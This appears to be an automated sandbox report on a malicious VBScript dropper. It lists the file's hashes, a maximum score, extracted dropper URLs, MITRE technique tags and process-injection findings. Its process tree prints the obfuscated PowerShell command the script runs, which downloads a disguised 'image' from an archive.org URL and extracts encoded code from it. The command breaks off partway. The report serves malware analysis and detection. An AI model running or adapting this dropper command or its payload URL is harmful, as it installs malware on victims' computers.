639983f2307c5ca4de91dd8128e4b68cc492206eb9cd86064bde0cbd2124e375

General

Target

niceworkeverseenonmybrandnewthings.vbs
Size

190KB
MD5

28c97dfde19efa88d6c84a0e7286154b
SHA1

3fe7be956df064cacdbecca32d73c05ca0d700d0
SHA256

639983f2307c5ca4de91dd8128e4b68cc492206eb9cd86064bde0cbd2124e375
SHA512

d0b7db1d451de64143e2b90b1614d628c2aca1e5739c1ff8f0c91a2cf33258d9be7068b08793fae57d84b0e16fbcb23107eea428eebe94037f91b6cf43c10b24
SSDEEP

3072:hb2nhXR7q3BWE12iLRXNEZC+eJxDXXCUgt5pQ9xgGwRzPC86zQRQ6QbQVQbQ0QWO:hbutgrAiLRaI+o2IZKUs3b2V+f4G

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg

exe.dropper

https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1824	powershell.exe
6	1824	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2884	powershell.exe
1824	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2884	powershell.exe
1824	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	1824	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2160 wrote to memory of 2884	2160	WScript.exe	31
PID 2160 wrote to memory of 2884	2160	WScript.exe	31
PID 2160 wrote to memory of 2884	2160	WScript.exe	31
PID 2884 wrote to memory of 1824	2884	powershell.exe	33
PID 2884 wrote to memory of 1824	2884	powershell.exe	33
PID 2884 wrote to memory of 1824	2884	powershell.exe	33

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\niceworkeverseenonmybrandnewthings.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⽃ ⇯ ⿉ ⭋ ⌼Bp⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBn⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼VQBy⽃ ⇯ ⿉ ⭋ ⌼Gw⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼9⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼JwBo⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bw⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼Og⽃ ⇯ ⿉ ⭋ ⌼v⽃ ⇯ ⿉ ⭋ ⌼C8⽃ ⇯ ⿉ ⭋ ⌼aQBh⽃ ⇯ ⿉ ⭋ ⌼DY⽃ ⇯ ⿉ ⭋ ⌼M⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼x⽃ ⇯ ⿉ ⭋ ⌼Dc⽃ ⇯ ⿉ ⭋ ⌼M⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼2⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼dQBz⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼GM⽃ ⇯ ⿉ ⭋ ⌼a⽃ ⇯ ⿉ ⭋ ⌼Bp⽃ ⇯ ⿉ ⭋ ⌼HY⽃ ⇯ ⿉ ⭋ ⌼ZQ⽃ ⇯ ⿉ ⭋ ⌼u⽃ ⇯ ⿉ ⭋ ⌼G8⽃ ⇯ ⿉ ⭋ ⌼cgBn⽃ ⇯ ⿉ ⭋ ⌼C8⽃ ⇯ ⿉ ⭋ ⌼Mg⽃ ⇯ ⿉ ⭋ ⌼v⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼cw⽃ ⇯ ⿉ ⭋ ⌼v⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼ZQB3⽃ ⇯ ⿉ ⭋ ⌼F8⽃ ⇯ ⿉ ⭋ ⌼aQBt⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼ZwBl⽃ ⇯ ⿉ ⭋ ⌼F8⽃ ⇯ ⿉ ⭋ ⌼Mg⽃ ⇯ ⿉ ⭋ ⌼w⽃ ⇯ ⿉ ⭋ ⌼DI⽃ ⇯ ⿉ ⭋ ⌼N⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼w⽃ ⇯ ⿉ ⭋ ⌼Dk⽃ ⇯ ⿉ ⭋ ⌼M⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼1⽃ ⇯ ⿉ ⭋ ⌼C8⽃ ⇯ ⿉ ⭋ ⌼bgBl⽃ ⇯ ⿉ ⭋ ⌼Hc⽃ ⇯ ⿉ ⭋ ⌼XwBp⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBn⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼LgBq⽃ ⇯ ⿉ ⭋ ⌼H⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼Zw⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼Ds⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼B3⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼YgBD⽃ ⇯ ⿉ ⭋ ⌼Gw⽃ ⇯ ⿉ ⭋ ⌼aQBl⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼D0⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼BO⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼dw⽃ ⇯ ⿉ ⭋ ⌼t⽃ ⇯ ⿉ ⭋ ⌼E8⽃ ⇯ ⿉ ⭋ ⌼YgBq⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼YwB0⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼UwB5⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼LgBO⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼u⽃ ⇯ ⿉ ⭋ ⌼Fc⽃ ⇯ ⿉ ⭋ ⌼ZQBi⽃ ⇯ ⿉ ⭋ ⌼EM⽃ ⇯ ⿉ ⭋ ⌼b⽃ ⇯ ⿉ ⭋ ⌼Bp⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼bgB0⽃ ⇯ ⿉ ⭋ ⌼Ds⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bp⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBn⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼QgB5⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼ZQBz⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼PQ⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼dwBl⽃ ⇯ ⿉ ⭋ ⌼GI⽃ ⇯ ⿉ ⭋ ⌼QwBs⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼ZQBu⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼LgBE⽃ ⇯ ⿉ ⭋ ⌼G8⽃ ⇯ ⿉ ⭋ ⌼dwBu⽃ ⇯ ⿉ ⭋ ⌼Gw⽃ ⇯ ⿉ ⭋ ⌼bwBh⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼R⽃ ⇯ ⿉ ⭋ ⌼Bh⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQ⽃ ⇯ ⿉ ⭋ ⌼o⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼aQBt⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼ZwBl⽃ ⇯ ⿉ ⭋ ⌼FU⽃ ⇯ ⿉ ⭋ ⌼cgBs⽃ ⇯ ⿉ ⭋ ⌼Ck⽃ ⇯ ⿉ ⭋ ⌼Ow⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼bQBh⽃ ⇯ ⿉ ⭋ ⌼Gc⽃ ⇯ ⿉ ⭋ ⌼ZQBU⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼e⽃ ⇯ ⿉ ⭋ ⌼B0⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼PQ⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼Fs⽃ ⇯ ⿉ ⭋ ⌼UwB5⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼LgBU⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼e⽃ ⇯ ⿉ ⭋ ⌼B0⽃ ⇯ ⿉ ⭋ ⌼C4⽃ ⇯ ⿉ ⭋ ⌼RQBu⽃ ⇯ ⿉ ⭋ ⌼GM⽃ ⇯ ⿉ ⭋ ⌼bwBk⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼bgBn⽃ ⇯ ⿉ ⭋ ⌼F0⽃ ⇯ ⿉ ⭋ ⌼Og⽃ ⇯ ⿉ ⭋ ⌼6⽃ ⇯ ⿉ ⭋ ⌼FU⽃ ⇯ ⿉ ⭋ ⌼V⽃ ⇯ ⿉ ⭋ ⌼BG⽃ ⇯ ⿉ ⭋ ⌼Dg⽃ ⇯ ⿉ ⭋ ⌼LgBH⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼BT⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼cgBp⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼Zw⽃ ⇯ ⿉ ⭋ ⌼o⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼aQBt⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼ZwBl⽃ ⇯ ⿉ ⭋ ⌼EI⽃ ⇯ ⿉ ⭋ ⌼eQB0⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼cw⽃ ⇯ ⿉ ⭋ ⌼p⽃ ⇯ ⿉ ⭋ ⌼Ds⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bz⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼RgBs⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼Zw⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼D0⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼Dw⽃ ⇯ ⿉ ⭋ ⌼P⽃ ⇯ ⿉ ⭋ ⌼BC⽃ ⇯ ⿉ ⭋ ⌼EE⽃ ⇯ ⿉ ⭋ ⌼UwBF⽃ ⇯ ⿉ ⭋ ⌼DY⽃ ⇯ ⿉ ⭋ ⌼N⽃ ⇯ ⿉ ⭋ ⌼Bf⽃ ⇯ ⿉ ⭋ ⌼FM⽃ ⇯ ⿉ ⭋ ⌼V⽃ ⇯ ⿉ ⭋ ⌼BB⽃ ⇯ ⿉ ⭋ ⌼FI⽃ ⇯ ⿉ ⭋ ⌼V⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼+⽃ ⇯ ⿉ ⭋ ⌼D4⽃ ⇯ ⿉ ⭋ ⌼Jw⽃ ⇯ ⿉ ⭋ ⌼7⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼ZQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼RgBs⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼Zw⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼D0⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼Dw⽃ ⇯ ⿉ ⭋ ⌼P⽃ ⇯ ⿉ ⭋ ⌼BC⽃ ⇯ ⿉ ⭋ ⌼EE⽃ ⇯ ⿉ ⭋ ⌼UwBF⽃ ⇯ ⿉ ⭋ ⌼DY⽃ ⇯ ⿉ ⭋ ⌼N⽃ ⇯ ⿉ ⭋ ⌼Bf⽃ ⇯ ⿉ ⭋ ⌼EU⽃ ⇯ ⿉ ⭋ ⌼TgBE⽃ ⇯ ⿉ ⭋ ⌼D4⽃ ⇯ ⿉ ⭋ ⌼Pg⽃ ⇯ ⿉ ⭋ ⌼n⽃ ⇯ ⿉ ⭋ ⌼Ds⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bz⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼SQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼ZQB4⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼PQ⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼aQBt⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼ZwBl⽃ ⇯ ⿉ ⭋ ⌼FQ⽃ ⇯ ⿉ ⭋ ⌼ZQB4⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼LgBJ⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼Hg⽃ ⇯ ⿉ ⭋ ⌼TwBm⽃ ⇯ ⿉ ⭋ ⌼Cg⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bz⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼RgBs⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼Zw⽃ ⇯ ⿉ ⭋ ⌼p⽃ ⇯ ⿉ ⭋ ⌼Ds⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼BJ⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼Hg⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼9⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bp⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBn⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼V⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼Hg⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼u⽃ ⇯ ⿉ ⭋ ⌼Ek⽃ ⇯ ⿉ ⭋ ⌼bgBk⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼e⽃ ⇯ ⿉ ⭋ ⌼BP⽃ ⇯ ⿉ ⭋ ⌼GY⽃ ⇯ ⿉ ⭋ ⌼K⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼bgBk⽃ ⇯ ⿉ ⭋ ⌼EY⽃ ⇯ ⿉ ⭋ ⌼b⽃ ⇯ ⿉ ⭋ ⌼Bh⽃ ⇯ ⿉ ⭋ ⌼Gc⽃ ⇯ ⿉ ⭋ ⌼KQ⽃ ⇯ ⿉ ⭋ ⌼7⽃ ⇯ ⿉ ⭋ ⌼CQ⽃ ⇯ ⿉ ⭋ ⌼cwB0⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼cgB0⽃ ⇯ ⿉ ⭋ ⌼Ek⽃ ⇯ ⿉ ⭋ ⌼bgBk⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼e⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼C0⽃ ⇯ ⿉ ⭋ ⌼ZwBl⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼M⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼C0⽃ ⇯ ⿉ ⭋ ⌼YQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼bgBk⽃ ⇯ ⿉ ⭋ ⌼Ek⽃ ⇯ ⿉ ⭋ ⌼bgBk⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼e⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼C0⽃ ⇯ ⿉ ⭋ ⌼ZwB0⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bz⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼SQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼ZQB4⽃ ⇯ ⿉ ⭋ ⌼Ds⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bz⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼SQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼ZQB4⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼Kw⽃ ⇯ ⿉ ⭋ ⌼9⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bz⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼RgBs⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼Zw⽃ ⇯ ⿉ ⭋ ⌼u⽃ ⇯ ⿉ ⭋ ⌼Ew⽃ ⇯ ⿉ ⭋ ⌼ZQBu⽃ ⇯ ⿉ ⭋ ⌼Gc⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bo⽃ ⇯ ⿉ ⭋ ⌼Ds⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bi⽃ ⇯ ⿉ ⭋ ⌼GE⽃ ⇯ ⿉ ⭋ ⌼cwBl⽃ ⇯ ⿉ ⭋ ⌼DY⽃ ⇯ ⿉ ⭋ ⌼N⽃ ⇯ ⿉ ⭋ ⌼BM⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼bgBn⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼a⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼D0⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼bgBk⽃ ⇯ ⿉ ⭋ ⌼Ek⽃ ⇯ ⿉ ⭋ ⌼bgBk⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼e⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼C0⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bh⽃ ⇯ ⿉ ⭋ ⌼HI⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼BJ⽃ ⇯ ⿉ ⭋ ⌼G4⽃ ⇯ ⿉ ⭋ ⌼Z⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼Hg⽃ ⇯ ⿉ ⭋ ⌼Ow⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GI⽃ ⇯ ⿉ ⭋ ⌼YQBz⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼Ng⽃ ⇯ ⿉ ⭋ ⌼0⽃ ⇯ ⿉ ⭋ ⌼EM⽃ ⇯ ⿉ ⭋ ⌼bwBt⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼9⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bp⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBn⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼V⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼Hg⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼u⽃ ⇯ ⿉ ⭋ ⌼FM⽃ ⇯ ⿉ ⭋ ⌼dQBi⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼By⽃ ⇯ ⿉ ⭋ ⌼Gk⽃ ⇯ ⿉ ⭋ ⌼bgBn⽃ ⇯ ⿉ ⭋ ⌼Cg⽃ ⇯ ⿉ ⭋ ⌼J⽃ ⇯ ⿉ ⭋ ⌼Bz⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼YQBy⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼SQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼ZQB4⽃ ⇯ ⿉ ⭋ ⌼Cw⽃ ⇯ ⿉ ⭋ ⌼I⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GI⽃ ⇯ ⿉ ⭋ ⌼YQBz⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼Ng⽃ ⇯ ⿉ ⭋ ⌼0⽃ ⇯ ⿉ ⭋ ⌼Ew⽃ ⇯ ⿉ ⭋ ⌼ZQBu⽃ ⇯ ⿉ ⭋ ⌼Gc⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bo⽃ ⇯ ⿉ ⭋ ⌼Ck⽃ ⇯ ⿉ ⭋ ⌼Ow⽃ ⇯ ⿉ ⭋ ⌼k⽃ ⇯ ⿉ ⭋ ⌼GM⽃ ⇯ ⿉ ⭋ ⌼bwBt⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼YQBu⽃ ⇯ ⿉ ⭋ ⌼GQ⽃ ⇯ ⿉ ⭋ ⌼QgB5⽃ ⇯ ⿉ ⭋ ⌼HQ⽃ ⇯ ⿉ ⭋ ⌼ZQBz⽃ ⇯ ⿉ ⭋ ⌼C⽃ ⇯ ⿉ ⭋ ⌼⽃ ⇯ ⿉ ⭋ ⌼PQ⽃ ⇯ ⿉ ⭋ ⌼g⽃ ⇯ ⿉ ⭋ ⌼Fs⽃ ⇯ ⿉ ⭋ ⌼UwB5⽃ ⇯ ⿉ ⭋ ⌼HM⽃ ⇯ ⿉ ⭋ ⌼d⽃ ⇯ ⿉ ⭋ ⌼Bl⽃ ⇯ ⿉ ⭋ ⌼G0⽃ ⇯ ⿉ ⭋ ⌼LgBD⽃ ⇯ ⿉ ⭋ ⌼G8⽃ ⇯ ⿉ ⭋ ⌼bgB2⽃ ⇯ ⿉ ⭋ ⌼GU⽃ ⇯ ⿉ ⭋ ⌼cgB0⽃ ⇯ ⿉ ⭋ ⌼F0⽃ ⇯ ⿉ ⭋ ⌼Og⽃ ⇯ ⿉ ⭋ 